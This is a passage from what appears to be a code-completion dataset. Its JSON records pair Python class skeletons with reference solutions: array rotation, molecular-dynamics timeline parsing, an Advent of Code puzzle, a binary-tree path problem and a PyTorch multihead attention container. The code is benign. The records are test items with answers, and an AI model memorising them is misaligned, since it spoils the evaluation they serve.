\"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def rotate_1(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n k = k % len(nums)\n for i in range(k):\n last = nums[-1]\n for j in range(len(nums) - 1, 0, -1):\n nums[j] = nums[j - 1]\n nums[0] = last\n\n def rotate_2(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n k = k % len(nums)\n\n def reverse(nums, left, right):\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n reverse(nums, 0, len(nums) - 1)\n reverse(nums, 0, k - 1)\n reverse(nums, k, len(nums) - 1)\n", "source": "the_stack_v2_python_sparse", "source_path": "Week_01/189_rotate_array.py", "source_repo": "slsefe/-algorithm015", "split": "test", "star_events_count": 0} {"blob_id": "e9313b3a10b4b607d77d4a726a3210c85c080256", "bodies": ["self.name = name\nself.timeline_files = timeline_files\nself.timeline_props = timeline_props\nself.timeframe = timestep * frequency * 1e-06\nself.residues = []\nself.parse_tml()", "for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return True\nreturn False", "for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return resi", "for file, prop in zip(self.timeline_files, self.timeline_props):\n with open(file) as fl:\n timeline = [line.rstrip('\\n').split() for line in fl.readlines() if '#' not in line]\n timeline = [[int(line[0]), line[2], float(line[3]) * self.timeframe, float(line[4])] for line in timeline]\n for line in timeline:\n new_residue = TimelineResidue(line[0], line[1])\n new_residue.add_property(prop, [line[2:4]])\n if new_residue not in self:\n self.residues.append(new_residue)\n else:\n self.get_resi(new_residue).properties[prop].append(line[2:4])\n for resi in self.residues:\n resi.mean_property(prop)", "resids = [resi.resid for resi in self.residues]\nprop_values = [[resi.means[prop] for resi in self.residues]]\nreturn np.array(list(zip(resids, *prop_values)))", "resids = [resi.resid for resi in self.residues]\nprop_values = []\nfor prop in props:\n prop_values.append([resi.means[prop] for resi in self.residues])\ndataseries = [np.array(list(zip(resids, *prop_values)))]\nmmplt.plot_simple_multiple_numpy(dataseries, 'Residue position', prop, [self.name], self.name, sizex=2.5, sizey=1.5)"], "bodies_text": "<|body_start_0|>\n self.name = name\n self.timeline_files = timeline_files\n self.timeline_props = timeline_props\n self.timeframe = timestep * frequency * 1e-06\n self.residues = []\n self.parse_tml()\n<|end_body_0|>\n\n<|body_start_1|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return resi\n<|end_body_2|>\n\n<|body_start_3|>\n for file, prop in zip(self.timeline_files, self.timeline_props):\n with open(file) as fl:\n timeline = [line.rstrip('\\n').split() for line in fl.readlines() if '#' not in line]\n timeline = [[int(line[0]), line[2], float(line[3]) * self.timeframe, float(line[4])] for line in timeline]\n for line in timeline:\n new_residue = TimelineResidue(line[0], line[1])\n new_residue.add_property(prop, [line[2:4]])\n if new_residue not in self:\n self.residues.append(new_residue)\n else:\n self.get_resi(new_residue).properties[prop].append(line[2:4])\n for resi in self.residues:\n resi.mean_property(prop)\n<|end_body_3|>\n\n<|body_start_4|>\n resids = [resi.resid for resi in self.residues]\n prop_values = [[resi.means[prop] for resi in self.residues]]\n return np.array(list(zip(resids, *prop_values)))\n<|end_body_4|>\n\n<|body_start_5|>\n resids = [resi.resid for resi in self.residues]\n prop_values = []\n for prop in props:\n prop_values.append([resi.means[prop] for resi in self.residues])\n dataseries = [np.array(list(zip(resids, *prop_values)))]\n mmplt.plot_simple_multiple_numpy(dataseries, 'Residue position', prop, [self.name], self.name, sizex=2.5, sizey=1.5)\n<|end_body_5|>\n", "class_docstring": "", "class_name": "TimelineSegment", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TimelineSegment:\n\n def __init__(self, timeline_files, timeline_props, timestep, frequency, name):\n \"\"\":param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\"\"\"\n <|body_0|>\n\n def __contains__(self, residue):\n \"\"\":param residue: check if residue present in timeline :return: true if present\"\"\"\n <|body_1|>\n\n def get_resi(self, residue):\n \"\"\":param residue: selected residue :return: get residue from timeline\"\"\"\n <|body_2|>\n\n def parse_tml(self):\n \"\"\"parse tml file\"\"\"\n <|body_3|>\n\n def get_prop(self, prop):\n \"\"\":param prop: :return:\"\"\"\n <|body_4|>\n\n def print_prop(self, props):\n \"\"\":param props: properties to plot\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.name = name\n self.timeline_files = timeline_files\n self.timeline_props = timeline_props\n self.timeframe = timestep * frequency * 1e-06\n self.residues = []\n self.parse_tml()\n<|end_body_0|>\n\n<|body_start_1|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return resi\n<|end_body_2|>\n\n<|body_start_3|>\n for file, prop in zip(self.timeline_files, self.timeline_props):\n with open(file) as fl:\n timeline = [line.rstrip('\\n').split() for line in fl.readlines() if '#' not in line]\n timeline = [[int(line[0]), line[2], float(line[3]) * self.timeframe, float(line[4])] for line in timeline]\n for line in timeline:\n new_residue = TimelineResidue(line[0], line[1])\n new_residue.add_property(prop, [line[2:4]])\n if new_residue not in self:\n self.residues.append(new_residue)\n else:\n self.get_resi(new_residue).properties[prop].append(line[2:4])\n for resi in self.residues:\n resi.mean_property(prop)\n<|end_body_3|>\n\n<|body_start_4|>\n resids = [resi.resid for resi in self.residues]\n prop_values = [[resi.means[prop] for resi in self.residues]]\n return np.array(list(zip(resids, *prop_values)))\n<|end_body_4|>\n\n<|body_start_5|>\n resids = [resi.resid for resi in self.residues]\n prop_values = []\n for prop in props:\n prop_values.append([resi.means[prop] for resi in self.residues])\n dataseries = [np.array(list(zip(resids, *prop_values)))]\n mmplt.plot_simple_multiple_numpy(dataseries, 'Residue position', prop, [self.name], self.name, sizex=2.5, sizey=1.5)\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000470", "length_bytes": 5752, "license_type": "no_license", "methods": [{"docstring": ":param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency", "name": "__init__", "signature": "def __init__(self, timeline_files, timeline_props, timestep, frequency, name)"}, {"docstring": ":param residue: check if residue present in timeline :return: true if present", "name": "__contains__", "signature": "def __contains__(self, residue)"}, {"docstring": ":param residue: selected residue :return: get residue from timeline", "name": "get_resi", "signature": "def get_resi(self, residue)"}, {"docstring": "parse tml file", "name": "parse_tml", "signature": "def parse_tml(self)"}, {"docstring": ":param prop: :return:", "name": "get_prop", "signature": "def get_prop(self, prop)"}, {"docstring": ":param props: properties to plot", "name": "print_prop", "signature": "def print_prop(self, props)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_001234", "prompt": "Implement the Python class `TimelineSegment` described below.\n\nClass description:\nImplement the TimelineSegment class.\n\nMethod signatures and docstrings:\n- def __init__(self, timeline_files, timeline_props, timestep, frequency, name): :param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\n- def __contains__(self, residue): :param residue: check if residue present in timeline :return: true if present\n- def get_resi(self, residue): :param residue: selected residue :return: get residue from timeline\n- def parse_tml(self): parse tml file\n- def get_prop(self, prop): :param prop: :return:\n- def print_prop(self, props): :param props: properties to plot", "prompted_full_text": "Implement the Python class `TimelineSegment` described below.\n\nClass description:\nImplement the TimelineSegment class.\n\nMethod signatures and docstrings:\n- def __init__(self, timeline_files, timeline_props, timestep, frequency, name): :param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\n- def __contains__(self, residue): :param residue: check if residue present in timeline :return: true if present\n- def get_resi(self, residue): :param residue: selected residue :return: get residue from timeline\n- def parse_tml(self): parse tml file\n- def get_prop(self, prop): :param prop: :return:\n- def print_prop(self, props): :param props: properties to plot\n\n<|skeleton|>\nclass TimelineSegment:\n\n def __init__(self, timeline_files, timeline_props, timestep, frequency, name):\n \"\"\":param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\"\"\"\n <|body_0|>\n\n def __contains__(self, residue):\n \"\"\":param residue: check if residue present in timeline :return: true if present\"\"\"\n <|body_1|>\n\n def get_resi(self, residue):\n \"\"\":param residue: selected residue :return: get residue from timeline\"\"\"\n <|body_2|>\n\n def parse_tml(self):\n \"\"\"parse tml file\"\"\"\n <|body_3|>\n\n def get_prop(self, prop):\n \"\"\":param prop: :return:\"\"\"\n <|body_4|>\n\n def print_prop(self, props):\n \"\"\":param props: properties to plot\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.name = name\n self.timeline_files = timeline_files\n self.timeline_props = timeline_props\n self.timeframe = timestep * frequency * 1e-06\n self.residues = []\n self.parse_tml()\n<|end_body_0|>\n\n<|body_start_1|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return resi\n<|end_body_2|>\n\n<|body_start_3|>\n for file, prop in zip(self.timeline_files, self.timeline_props):\n with open(file) as fl:\n timeline = [line.rstrip('\\n').split() for line in fl.readlines() if '#' not in line]\n timeline = [[int(line[0]), line[2], float(line[3]) * self.timeframe, float(line[4])] for line in timeline]\n for line in timeline:\n new_residue = TimelineResidue(line[0], line[1])\n new_residue.add_property(prop, [line[2:4]])\n if new_residue not in self:\n self.residues.append(new_residue)\n else:\n self.get_resi(new_residue).properties[prop].append(line[2:4])\n for resi in self.residues:\n resi.mean_property(prop)\n<|end_body_3|>\n\n<|body_start_4|>\n resids = [resi.resid for resi in self.residues]\n prop_values = [[resi.means[prop] for resi in self.residues]]\n return np.array(list(zip(resids, *prop_values)))\n<|end_body_4|>\n\n<|body_start_5|>\n resids = [resi.resid for resi in self.residues]\n prop_values = []\n for prop in props:\n prop_values.append([resi.means[prop] for resi in self.residues])\n dataseries = [np.array(list(zip(resids, *prop_values)))]\n mmplt.plot_simple_multiple_numpy(dataseries, 'Residue position', prop, [self.name], self.name, sizex=2.5, sizey=1.5)\n<|end_body_5|>\n", "revision_id": "fdb8a1a14bcf0b372ebaf152f2bbb1f5d804172e", "skeleton": "<|skeleton|>\nclass TimelineSegment:\n\n def __init__(self, timeline_files, timeline_props, timestep, frequency, name):\n \"\"\":param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\"\"\"\n <|body_0|>\n\n def __contains__(self, residue):\n \"\"\":param residue: check if residue present in timeline :return: true if present\"\"\"\n <|body_1|>\n\n def get_resi(self, residue):\n \"\"\":param residue: selected residue :return: get residue from timeline\"\"\"\n <|body_2|>\n\n def parse_tml(self):\n \"\"\"parse tml file\"\"\"\n <|body_3|>\n\n def get_prop(self, prop):\n \"\"\":param prop: :return:\"\"\"\n <|body_4|>\n\n def print_prop(self, props):\n \"\"\":param props: properties to plot\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TimelineSegment:\n def __init__(self, timeline_files, timeline_props, timestep, frequency, name):\n \"\"\":param timeline_files: tml files :param timeline_props: tml files properties :param timestep: md timestep :param frequency: md trajectory save frequency\"\"\"\n self.name = name\n self.timeline_files = timeline_files\n self.timeline_props = timeline_props\n self.timeframe = timestep * frequency * 1e-06\n self.residues = []\n self.parse_tml()\n\n def __contains__(self, residue):\n \"\"\":param residue: check if residue present in timeline :return: true if present\"\"\"\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return True\n return False\n\n def get_resi(self, residue):\n \"\"\":param residue: selected residue :return: get residue from timeline\"\"\"\n for resi in self.residues:\n if residue.resid == resi.resid and residue.segname == resi.segname:\n return resi\n\n def parse_tml(self):\n \"\"\"parse tml file\"\"\"\n for file, prop in zip(self.timeline_files, self.timeline_props):\n with open(file) as fl:\n timeline = [line.rstrip('\\n').split() for line in fl.readlines() if '#' not in line]\n timeline = [[int(line[0]), line[2], float(line[3]) * self.timeframe, float(line[4])] for line in timeline]\n for line in timeline:\n new_residue = TimelineResidue(line[0], line[1])\n new_residue.add_property(prop, [line[2:4]])\n if new_residue not in self:\n self.residues.append(new_residue)\n else:\n self.get_resi(new_residue).properties[prop].append(line[2:4])\n for resi in self.residues:\n resi.mean_property(prop)\n\n def get_prop(self, prop):\n \"\"\":param prop: :return:\"\"\"\n resids = [resi.resid for resi in self.residues]\n prop_values = [[resi.means[prop] for resi in self.residues]]\n return np.array(list(zip(resids, *prop_values)))\n\n def print_prop(self, props):\n \"\"\":param props: properties to plot\"\"\"\n resids = [resi.resid for resi in self.residues]\n prop_values = []\n for prop in props:\n prop_values.append([resi.means[prop] for resi in self.residues])\n dataseries = [np.array(list(zip(resids, *prop_values)))]\n mmplt.plot_simple_multiple_numpy(dataseries, 'Residue position', prop, [self.name], self.name, sizex=2.5, sizey=1.5)\n", "source": "the_stack_v2_python_sparse", "source_path": "dynamics_analysis/mm_analysis_timeline.py", "source_repo": "michal2am/bioscripts", "split": "test", "star_events_count": 3} {"blob_id": "a67028db1ac6093b14f47bcdae8bfaf5e41bcc51", "bodies": ["sets = collections()\nboss = Char(104, 8, 1)\nreturn part1(sets, boss)", "sets = collections()\nboss = Char(104, 8, 1)\nreturn part2(sets, boss)"], "bodies_text": "<|body_start_0|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part1(sets, boss)\n<|end_body_0|>\n\n<|body_start_1|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part2(sets, boss)\n<|end_body_1|>\n", "class_docstring": "AoC 2015 Day 21", "class_name": "Day21", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Day21:\n \"\"\"AoC 2015 Day 21\"\"\"\n\n def part1(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 1\"\"\"\n <|body_0|>\n\n def part2(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part1(sets, boss)\n<|end_body_0|>\n\n<|body_start_1|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part2(sets, boss)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000471", "length_bytes": 3590, "license_type": "no_license", "methods": [{"docstring": "Given a filename, solve 2015 day 21 part 1", "name": "part1", "signature": "def part1(_filename: str) -> int"}, {"docstring": "Given a filename, solve 2015 day 21 part 2", "name": "part2", "signature": "def part2(_filename: str) -> int"}], "n_methods": 2, "prompt": "Implement the Python class `Day21` described below.\n\nClass description:\nAoC 2015 Day 21\n\nMethod signatures and docstrings:\n- def part1(_filename: str) -> int: Given a filename, solve 2015 day 21 part 1\n- def part2(_filename: str) -> int: Given a filename, solve 2015 day 21 part 2", "prompted_full_text": "Implement the Python class `Day21` described below.\n\nClass description:\nAoC 2015 Day 21\n\nMethod signatures and docstrings:\n- def part1(_filename: str) -> int: Given a filename, solve 2015 day 21 part 1\n- def part2(_filename: str) -> int: Given a filename, solve 2015 day 21 part 2\n\n<|skeleton|>\nclass Day21:\n \"\"\"AoC 2015 Day 21\"\"\"\n\n def part1(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 1\"\"\"\n <|body_0|>\n\n def part2(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part1(sets, boss)\n<|end_body_0|>\n\n<|body_start_1|>\n sets = collections()\n boss = Char(104, 8, 1)\n return part2(sets, boss)\n<|end_body_1|>\n", "revision_id": "e89db235837d2d05848210a18c9c2a4456085570", "skeleton": "<|skeleton|>\nclass Day21:\n \"\"\"AoC 2015 Day 21\"\"\"\n\n def part1(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 1\"\"\"\n <|body_0|>\n\n def part2(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 2\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Day21:\n \"\"\"AoC 2015 Day 21\"\"\"\n\n def part1(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 1\"\"\"\n sets = collections()\n boss = Char(104, 8, 1)\n return part1(sets, boss)\n\n def part2(_filename: str) -> int:\n \"\"\"Given a filename, solve 2015 day 21 part 2\"\"\"\n sets = collections()\n boss = Char(104, 8, 1)\n return part2(sets, boss)\n", "source": "the_stack_v2_python_sparse", "source_path": "2015/python2015/aoc/day21.py", "source_repo": "mreishus/aoc", "split": "test", "star_events_count": 16} {"blob_id": "e563081bd06de46d07aa505d6e7670695d9dda24", "bodies": ["self.res = 0\nself.dfs(root)\nreturn self.res", "if not root:\n return 0\nleft = self.dfs(root.left)\nright = self.dfs(root.right)\nif root.left and root.left.val == root.val:\n left += 1\nelse:\n left = 0\nif root.right and root.right.val == root.val:\n right += 1\nelse:\n right = 0\nself.res = max(self.res, left + right)\nreturn max(left, right)"], "bodies_text": "<|body_start_0|>\n self.res = 0\n self.dfs(root)\n return self.res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n left = self.dfs(root.left)\n right = self.dfs(root.right)\n if root.left and root.left.val == root.val:\n left += 1\n else:\n left = 0\n if root.right and root.right.val == root.val:\n right += 1\n else:\n right = 0\n self.res = max(self.res, left + right)\n return max(left, right)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def longestUnivaluePath(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_0|>\n\n def dfs(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.res = 0\n self.dfs(root)\n return self.res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n left = self.dfs(root.left)\n right = self.dfs(root.right)\n if root.left and root.left.val == root.val:\n left += 1\n else:\n left = 0\n if root.right and root.right.val == root.val:\n right += 1\n else:\n right = 0\n self.res = max(self.res, left + right)\n return max(left, right)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000472", "length_bytes": 1692, "license_type": "no_license", "methods": [{"docstring": "Args: root: TreeNode Return: int", "name": "longestUnivaluePath", "signature": "def longestUnivaluePath(self, root)"}, {"docstring": "Args: root: TreeNode Return: int", "name": "dfs", "signature": "def dfs(self, root)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def longestUnivaluePath(self, root): Args: root: TreeNode Return: int\n- def dfs(self, root): Args: root: TreeNode Return: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def longestUnivaluePath(self, root): Args: root: TreeNode Return: int\n- def dfs(self, root): Args: root: TreeNode Return: int\n\n<|skeleton|>\nclass Solution:\n\n def longestUnivaluePath(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_0|>\n\n def dfs(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.res = 0\n self.dfs(root)\n return self.res\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return 0\n left = self.dfs(root.left)\n right = self.dfs(root.right)\n if root.left and root.left.val == root.val:\n left += 1\n else:\n left = 0\n if root.right and root.right.val == root.val:\n right += 1\n else:\n right = 0\n self.res = max(self.res, left + right)\n return max(left, right)\n<|end_body_1|>\n", "revision_id": "101bce2fac8b188a4eb2f5e017293d21ad0ecb21", "skeleton": "<|skeleton|>\nclass Solution:\n\n def longestUnivaluePath(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_0|>\n\n def dfs(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def longestUnivaluePath(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n self.res = 0\n self.dfs(root)\n return self.res\n\n def dfs(self, root):\n \"\"\"Args: root: TreeNode Return: int\"\"\"\n if not root:\n return 0\n left = self.dfs(root.left)\n right = self.dfs(root.right)\n if root.left and root.left.val == root.val:\n left += 1\n else:\n left = 0\n if root.right and root.right.val == root.val:\n right += 1\n else:\n right = 0\n self.res = max(self.res, left + right)\n return max(left, right)\n", "source": "the_stack_v2_python_sparse", "source_path": "code/687. 最长同值路径.py", "source_repo": "AiZhanghan/Leetcode", "split": "test", "star_events_count": 0} {"blob_id": "fe15c9bfa4e5a2c0314ab4fba28d5c206524fcdd", "bodies": ["super(MultiheadAttentionContainer, self).__init__()\nself.nhead = nhead\nself.in_proj_container = in_proj_container\nself.attention_layer = attention_layer\nself.out_proj = out_proj\nself.batch_first = batch_first", "if self.batch_first:\n query, key, value = (query.transpose(-3, -2), key.transpose(-3, -2), value.transpose(-3, -2))\ntgt_len, src_len, bsz, embed_dim = (query.size(-3), key.size(-3), query.size(-2), query.size(-1))\nq, k, v = self.in_proj_container(query, key, value)\nassert q.size(-1) % self.nhead == 0, \"query's embed_dim must be divisible by the number of heads\"\nhead_dim = q.size(-1) // self.nhead\nq = q.reshape(tgt_len, bsz * self.nhead, head_dim)\nassert k.size(-1) % self.nhead == 0, \"key's embed_dim must be divisible by the number of heads\"\nhead_dim = k.size(-1) // self.nhead\nk = k.reshape(src_len, bsz * self.nhead, head_dim)\nassert v.size(-1) % self.nhead == 0, \"value's embed_dim must be divisible by the number of heads\"\nhead_dim = v.size(-1) // self.nhead\nv = v.reshape(src_len, bsz * self.nhead, head_dim)\nattn_output, attn_output_weights = self.attention_layer(q, k, v, attn_mask=attn_mask, bias_k=bias_k, bias_v=bias_v)\nattn_output = attn_output.reshape(tgt_len, bsz, embed_dim)\nattn_output = self.out_proj(attn_output)\nif self.batch_first:\n attn_output = attn_output.transpose(-3, -2)\nreturn (attn_output, attn_output_weights)"], "bodies_text": "<|body_start_0|>\n super(MultiheadAttentionContainer, self).__init__()\n self.nhead = nhead\n self.in_proj_container = in_proj_container\n self.attention_layer = attention_layer\n self.out_proj = out_proj\n self.batch_first = batch_first\n<|end_body_0|>\n\n<|body_start_1|>\n if self.batch_first:\n query, key, value = (query.transpose(-3, -2), key.transpose(-3, -2), value.transpose(-3, -2))\n tgt_len, src_len, bsz, embed_dim = (query.size(-3), key.size(-3), query.size(-2), query.size(-1))\n q, k, v = self.in_proj_container(query, key, value)\n assert q.size(-1) % self.nhead == 0, \"query's embed_dim must be divisible by the number of heads\"\n head_dim = q.size(-1) // self.nhead\n q = q.reshape(tgt_len, bsz * self.nhead, head_dim)\n assert k.size(-1) % self.nhead == 0, \"key's embed_dim must be divisible by the number of heads\"\n head_dim = k.size(-1) // self.nhead\n k = k.reshape(src_len, bsz * self.nhead, head_dim)\n assert v.size(-1) % self.nhead == 0, \"value's embed_dim must be divisible by the number of heads\"\n head_dim = v.size(-1) // self.nhead\n v = v.reshape(src_len, bsz * self.nhead, head_dim)\n attn_output, attn_output_weights = self.attention_layer(q, k, v, attn_mask=attn_mask, bias_k=bias_k, bias_v=bias_v)\n attn_output = attn_output.reshape(tgt_len, bsz, embed_dim)\n attn_output = self.out_proj(attn_output)\n if self.batch_first:\n attn_output = attn_output.transpose(-3, -2)\n return (attn_output, attn_output_weights)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MultiheadAttentionContainer", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MultiheadAttentionContainer:\n\n def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None:\n \"\"\"A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu\"\"\"\n <|body_0|>\n\n def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(MultiheadAttentionContainer, self).__init__()\n self.nhead = nhead\n self.in_proj_container = in_proj_container\n self.attention_layer = attention_layer\n self.out_proj = out_proj\n self.batch_first = batch_first\n<|end_body_0|>\n\n<|body_start_1|>\n if self.batch_first:\n query, key, value = (query.transpose(-3, -2), key.transpose(-3, -2), value.transpose(-3, -2))\n tgt_len, src_len, bsz, embed_dim = (query.size(-3), key.size(-3), query.size(-2), query.size(-1))\n q, k, v = self.in_proj_container(query, key, value)\n assert q.size(-1) % self.nhead == 0, \"query's embed_dim must be divisible by the number of heads\"\n head_dim = q.size(-1) // self.nhead\n q = q.reshape(tgt_len, bsz * self.nhead, head_dim)\n assert k.size(-1) % self.nhead == 0, \"key's embed_dim must be divisible by the number of heads\"\n head_dim = k.size(-1) // self.nhead\n k = k.reshape(src_len, bsz * self.nhead, head_dim)\n assert v.size(-1) % self.nhead == 0, \"value's embed_dim must be divisible by the number of heads\"\n head_dim = v.size(-1) // self.nhead\n v = v.reshape(src_len, bsz * self.nhead, head_dim)\n attn_output, attn_output_weights = self.attention_layer(q, k, v, attn_mask=attn_mask, bias_k=bias_k, bias_v=bias_v)\n attn_output = attn_output.reshape(tgt_len, bsz, embed_dim)\n attn_output = self.out_proj(attn_output)\n if self.batch_first:\n attn_output = attn_output.transpose(-3, -2)\n return (attn_output, attn_output_weights)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000473", "length_bytes": 13955, "license_type": "permissive", "methods": [{"docstring": "A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall MultiheadAttentionContainer with broadcast. out_proj: The multi-head out-projection layer (a.k.a nn.Linear). batch_first: If ``True``, then the inpu", "name": "__init__", "signature": "def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None"}, {"docstring": "Args: query (Tensor): The query of the attention function. See \"Attention Is All You Need\" for more details. key (Tensor): The keys of the attention function. See \"Attention Is All You Need\" for more details. value (Tensor): The values of the attention function. See \"Attention Is All You Need\" for more details. attn_mask (BoolTensor, optional): 3D mask that prevents attention to certain positions. bias_k (Tensor, optional): one more key and value sequence to be added to keys at sequence dim (dim=-3). Those are used for incremental decoding. Users should provide ``bias_v``. bias_v (Tensor, optional): one more key and value sequence to be added to values at sequence dim (dim=-3). Those are use", "name": "forward", "signature": "def forward(self, query: torch.Tensor, key: torch.Tensor, value: torch.Tensor, attn_mask: Optional[torch.Tensor]=None, bias_k: Optional[torch.Tensor]=None, bias_v: Optional[torch.Tensor]=None) -> Tuple[torch.Tensor, torch.Tensor]"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002842", "prompt": "Implement the Python class `MultiheadAttentionContainer` described below.\n\nClass description:\nImplement the MultiheadAttentionContainer class.\n\nMethod signatures and docstrings:\n- def __init__(self, nhead, in_proj_container, attention_layer, out_proj, batch_first=False) -> None: A multi-head attention container Args: nhead: the number of heads in the multiheadattention model in_proj_container: A container of multi-head in-projection linear layers (a.k.a nn.Linear). attention_layer: The custom attention layer. The input sent from MHA container to the attention layer is in the shape of `(..., L, N * H, E / H)` for query and `(..., S, N * H, E / H)` for key/value while the output shape of the attention layer is expected to be `(..., L, N * H, E / H)`. The attention_layer needs to support broadcast if users want the overall 